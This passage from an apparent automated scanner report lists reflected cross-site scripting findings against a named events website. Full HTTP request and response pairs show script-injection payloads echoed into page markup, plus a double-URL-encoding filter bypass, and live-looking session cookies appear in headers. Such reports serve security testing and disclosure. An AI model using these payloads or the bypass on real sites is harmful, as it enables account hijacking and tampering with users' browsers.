Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BAA0A4E3D8DA072903C9105A9AD18668; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 146
Date: Fri, 28 Jan 2011 16:42:08 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("7hSy8PbjRnOXSf2i_40364845ddf3f<script>alert(1)</script>ed09fa2b95");

4.404. http://events.cbs6albany.com/ [376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/

Issue detail

The value of the 376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd3fe"><script>alert(1)</script>4fe2eb96fc6 was submitted in the 376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1cd3fe"><script>alert(1)</script>4fe2eb96fc6 HTTP/1.1
Host: events.cbs6albany.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 02:01:52 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 94
ETag: "31918f17271fc00ea416f0b83b383361"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: welcome=nVWDjTFsTZ5trFFm8r8ryg.100055494; path=/; expires=Sun, 29-Jan-2012 02:01:52 GMT
Set-Cookie: zvents_tracker_sid=nVWDjTFsTZ5trFFm8r8ryg.100055494; path=/; expires=Sun, 29-Jan-2012 02:01:52 GMT
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlMTViYjI3MjFmZTU4ZGQ3NTgyN2MzMWFkZjlkY2U3MTYiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--70355ead04c69491676a945c6ab82f0f18eab221; path=/; expires=Fri, 29-Apr-2011 02:01:52 GMT; HttpOnly
Content-Length: 49435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1cd3fe"><script>alert(1)</script>4fe2eb96fc6" />
...[SNIP]...

4.405. http://events.cbs6albany.com/ [376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/

Issue detail

The value of the 376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 388f4"><script>alert(1)</script>42460964186 was submitted in the 376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1388f4"><script>alert(1)</script>42460964186 HTTP/1.1
Host: events.cbs6albany.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; Zvents=fnr9vfxsab; SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298828234584%26vn%3D1; s_invisit=true; c_m=NoneDirect%20LoadDirect%20Load; cf=1; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296367200803%26vn%3D1; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; __qca=P0-387650238-1296236241942

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 02:02:50 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 45
ETag: "7d101c69a516b70523b811d0f5f37e06"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; path=/; expires=Fri, 29-Apr-2011 02:02:50 GMT; HttpOnly
Content-Length: 49491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1388f4"><script>alert(1)</script>42460964186" />
...[SNIP]...

4.406. http://events.cbs6albany.com/ [376e5%22%3e%3cscript%3ealert(1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/

Issue detail

The value of the 376e5%22%3e%3cscript%3ealert(1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d58b9"><script>alert(1)</script>83d0d4a44c4 was submitted in the 376e5%22%3e%3cscript%3ealert(1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?376e5%22%3e%3cscript%3ealert(1d58b9"><script>alert(1)</script>83d0d4a44c4 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:30:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 43
ETag: "25454dda258b53938f11c88f035c760f"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:30:32 GMT; HttpOnly
Content-Length: 49693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?376e5%22%3e%3cscript%3ealert(1d58b9"><script>alert(1)</script>83d0d4a44c4" />
...[SNIP]...

4.407. http://events.cbs6albany.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd942"><script>alert(1)</script>22ceebdf215 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1&bd942"><script>alert(1)</script>22ceebdf215=1 HTTP/1.1
Host: events.cbs6albany.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 02:02:40 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 43
ETag: "d123457c4ed5651238ca2afbf5dcabac"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: welcome=HsppwAf-8ZBZ8sAKo3MFBg.100055542; path=/; expires=Sun, 29-Jan-2012 02:02:40 GMT
Set-Cookie: zvents_tracker_sid=HsppwAf-8ZBZ8sAKo3MFBg.100055542; path=/; expires=Sun, 29-Jan-2012 02:02:40 GMT
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlMWJiZTYwZDI2NGMyM2U3ZjJjMDNjOGI2N2RmYmY3MGUiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--acc9a8184bf0ed5c3298879bf07f62496c6221fb; path=/; expires=Fri, 29-Apr-2011 02:02:40 GMT; HttpOnly
Content-Length: 49459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1&bd942"><script>alert(1)</script>22ceebdf215=1" />
...[SNIP]...

4.408. http://events.cbs6albany.com/albany-ny/events [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb0aa"><script>alert(1)</script>32bdd3a6cef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-ny/events?cb0aa"><script>alert(1)</script>32bdd3a6cef=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:39:09 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 56
ETag: "8b123d3df63ac4fb695485452346aa0f"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:39:09 GMT; HttpOnly
Content-Length: 49688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-ny/events?cb0aa"><script>alert(1)</script>32bdd3a6cef=1" />
...[SNIP]...

4.409. http://events.cbs6albany.com/albany-ny/events/business+tech [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/business+tech

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 578e3"><script>alert(1)</script>09fec9f16b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-ny/events/business+tech?578e3"><script>alert(1)</script>09fec9f16b2=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:43:01 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 98
ETag: "c7f1540b5552f415f3bff2792fecec91"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:43:01 GMT; HttpOnly
Content-Length: 18466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-ny/events/business+tech?578e3"><script>alert(1)</script>09fec9f16b2=1" />
...[SNIP]...

4.410. http://events.cbs6albany.com/albany-ny/events/performing+arts [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/performing+arts

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f39fa"><a>eda79b0a89f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /albany-nyf39fa"><a>eda79b0a89f/events/performing+arts HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:49:19 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 389
ETag: "22e832e3bdbcba103b33f9260d9d0544"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexEiCWNpdHkiC0FsYmFueSILcmFkaXVzaVAiDWxhdGl0dWRlZho0Mi42NTI1NzkyOTk5OTk5OTkAxfYiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIPQWxiYW55LCBOWSIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU2MjMxNzAwMDAwMDAxAOy0IhF3aGVyZV9zdHJpbmdAFCIMYWRkcmVzcyIjYWxiYW55LW55ZjM5ZmEiPjxhPmVkYTc5YjBhODlmIgpzdGF0ZSIHTlk%3D--4d4c7f5d1df1722d29d80ffc4f2b82f86bc7b0d2; path=/; expires=Fri, 29-Apr-2011 05:49:19 GMT; HttpOnly
Content-Length: 33703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-nyf39fa"><a>eda79b0a89f/events/performing+arts" />
...[SNIP]...

4.411. http://events.cbs6albany.com/albany-ny/events/performing+arts [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/performing+arts

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9b91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bb2d08bb55 was submitted in the REST URL parameter 3. This input was echoed as e9b91"><script>alert(1)</script>5bb2d08bb55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albany-ny/events/performing+artse9b91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bb2d08bb55 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
